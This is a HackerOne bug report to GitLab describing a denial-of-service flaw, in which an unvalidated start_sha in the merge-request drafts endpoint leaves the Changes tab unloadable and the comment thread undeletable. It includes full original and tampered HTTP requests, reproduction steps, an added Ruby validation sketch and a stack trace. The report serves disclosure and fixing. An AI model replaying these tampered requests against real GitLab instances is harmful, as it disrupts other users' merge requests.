Invalid 'start_sha' value in POST `/{group}/{project}/-/merge_requests/{id}/drafts` when commenting on merge requests leaves Changes unable to load
HackerOne report #2058514 by toukakirishima
on 2023-07-09, assigned to GitLab Team
Report
Summary
I found a DOS vulnerability when commenting on a file in merge requests (on the Changes menu). I noticed that if start_sha is not validated first, it causes a DOS (the user can't load the file on the Changes menu and can't delete the thread).
Normally you can delete threads that you have created, and you can load files on the Changes menu.
But as an attacker I can make the victim unable to load the file on the Changes menu and unable to delete the thread. Even an admin can't delete the thread.
Let's say Touka Attacker is the attacker and Touka Kirishima is the victim.
And Touka Kirishima (the victim) made the merge request.
Steps to reproduce
- Go to the merge request
- Go to the Changes menu
- Comment on a file
- Click Start a review and make sure Burp Suite is on. You will see a request like the following. Example:
POST /toukak/aaaa/-/merge_requests/4/drafts HTTP/2
Host: gitlab.com
Cookie: x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: application/json, text/plain, */*
Accept-Language: id,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: https://gitlab.com/toukak/aaaa/-/merge_requests/4/diffs
X-Csrf-Token: x
X-Requested-With: XMLHttpRequest
Content-Type: application/json
Content-Length: 707
Origin: https://gitlab.com
Dnt: 1
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
{"line_type":"old","merge_request_diff_head_sha":"d5d27e5e75cb66f567f39c7fe8ea2daea67f03a9","in_reply_to_discussion_id":"","note_project_id":"","target_type":"merge_request","target_id":235434679,"return_discussion":true,"draft_note":{"note":"Hehe","position":"{\"base_sha\":\"fe0ced6306a3fe0b992d2c4a9204169c1538279f\",\"start_sha\":\"fe0ced6306a3fe0b992d2c4a9204169c1538279f\",\"head_sha\":\"d5d27e5e75cb66f567f39c7fe8ea2daea67f03a9\",\"old_path\":\"hehe\",\"new_path\":\"hehe\",\"position_type\":\"file\",\"old_line\":null,\"new_line\":null,\"line_range\":{},\"ignore_whitespace_change\":false}","noteable_type":"MergeRequest","noteable_id":235434679,"commit_id":null,"type":"DiffNote","line_code":null}}
- Send the request to Repeater
- Change start_sha. Example:
POST /toukak/aaaa/-/merge_requests/4/drafts HTTP/2
Host: gitlab.com
Cookie: x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: application/json, text/plain, */*
Accept-Language: id,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: https://gitlab.com/toukak/aaaa/-/merge_requests/4/diffs
X-Csrf-Token: x
X-Requested-With: XMLHttpRequest
Content-Type: application/json
Content-Length: 707
Origin: https://gitlab.com
Dnt: 1
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
{"line_type":"old","merge_request_diff_head_sha":"d5d27e5e75cb66f567f39c7fe8ea2daea67f03a9","in_reply_to_discussion_id":"","note_project_id":"","target_type":"merge_request","target_id":235434679,"return_discussion":true,"draft_note":{"note":"Hehe","position":"{\"base_sha\":\"fe0ced6306a3fe0b992d2c4a9204169c1538279f\",\"start_sha\":\"fe0ced6306a3fe0b992d2c4a9204169c15382791\",\"head_sha\":\"d5d27e5e75cb66f567f39c7fe8ea2daea67f03a9\",\"old_path\":\"hehe\",\"new_path\":\"hehe\",\"position_type\":\"file\",\"old_line\":null,\"new_line\":null,\"line_range\":{},\"ignore_whitespace_change\":false}","noteable_type":"MergeRequest","noteable_id":235434679,"commit_id":null,"type":"DiffNote","line_code":null}}
- Click Send
- Finish and submit the review
- Reload the page: you are unable to load the file on the Changes menu and can't delete the thread
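The server-side check this report says is missing, written as an added example (not GitLab's code): every SHA in the draft note's JSON-encoded "position" must be a well-formed commit id that belongs to the merge request. It assumes the caller supplies `known_shas` from the merge request's stored diff versions; the sample SHAs are the ones from the request above.

```ruby
require 'json'
require 'set'

# Added example, not GitLab's code. Models the validation the report
# says is missing: base_sha, start_sha and head_sha in a draft note's
# "position" must be commit ids the merge request actually knows.
SHA_RE = /\A\h{40}\z/.freeze
SHA_KEYS = %w[base_sha start_sha head_sha].freeze

# known_shas: set of commit ids from the merge request's diff versions
# (assumed to be built by the caller from the MR's own records).
# Returns a list of error strings; an empty list means the position is
# acceptable and can be safely stored.
def validate_position(position_json, known_shas)
  pos = JSON.parse(position_json)
  return ['position must be a JSON object'] unless pos.is_a?(Hash)

  SHA_KEYS.each_with_object([]) do |key, errors|
    value = pos[key]
    if !value.is_a?(String) || !SHA_RE.match?(value)
      errors << "#{key} is missing or not a 40-hex commit id"
    elsif !known_shas.include?(value)
      # An unknown SHA can be stored but never resolved back to a diff,
      # which is what leaves the thread undeletable and the file unloadable.
      errors << "#{key} #{value} is not a commit of this merge request"
    end
  end
rescue JSON::ParserError => e
  ["position is not valid JSON: #{e.message}"]
end

# Diff refs taken from the request shown in the report.
KNOWN_SHAS = Set[
  'fe0ced6306a3fe0b992d2c4a9204169c1538279f',
  'd5d27e5e75cb66f567f39c7fe8ea2daea67f03a9'
].freeze

# Position string as the browser sent it, and as modified in Repeater.
VALID_POSITION = '{"base_sha":"fe0ced6306a3fe0b992d2c4a9204169c1538279f",' \
  '"start_sha":"fe0ced6306a3fe0b992d2c4a9204169c1538279f",' \
  '"head_sha":"d5d27e5e75cb66f567f39c7fe8ea2daea67f03a9",' \
  '"old_path":"hehe","new_path":"hehe","position_type":"file"}'
TAMPERED_POSITION = VALID_POSITION.sub(
  '"start_sha":"fe0ced6306a3fe0b992d2c4a9204169c1538279f"',
  '"start_sha":"fe0ced6306a3fe0b992d2c4a9204169c15382791"'
)

if $PROGRAM_NAME == __FILE__
  p validate_position(VALID_POSITION, KNOWN_SHAS)    # []
  p validate_position(TAMPERED_POSITION, KNOWN_SHAS) # one start_sha error
end
```

Rejecting the request with these errors (HTTP 400 or 422) before the draft note is persisted prevents the unloadable discussion from ever being created.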
POV from Attacker
POV from Victim
POC
bandicam_2023-07-09_19-04-28-764.mp4
Relevant logs and/or screenshots
TypeError: this.discussion.diff_file is null diffViewerMode diff_with_note.vue:44 VueJS 3 get evaluate Gr isTextFile diff_with_note.vue:56 VueJS 3 get evaluate Gr U diff_with_note.vue:1 VueJS 52 _render r get t mount $mount init d d g d g d g d g d g d Lo _update r get t mount $mount init d d Lo _update r get t mount $mount init d d D E E E E Lo _update r get run mr Cn _n instrument.js:108:32 kt instrument.js:108 VueJS 55 mn gn pn _render r get t mount $mount init d d g d g d g d g d g d Lo _update r get t mount $mount init d d Lo _update r get t mount $mount init d d D E E E E Lo _update r get run mr Cn _n
Output of checks
This bug happens on GitLab.com
Impact
- Attacker can make the victim unable to load the file on the Changes menu.
- Attacker can make the victim unable to delete the thread. Even an admin can't delete the thread.
Attachments
Warning: Attachments received through HackerOne, please exercise caution!
- gambar.png
- gambar.png
- gambar.png
- Screenshot_10.png
- gambar.png
- gambar.png
- gambar.png
- gambar.png
- Screenshot_12.png
- gambar.png
- gambar.png
- Screenshot_13.png
- gambar.png
- Screenshot_14.png
- Screenshot_15.png
- Screenshot_16.png
- gambar.png
- bandicam_2023-07-09_19-04-28-764.mp4
How To Reproduce
Please add reproducibility information to this section: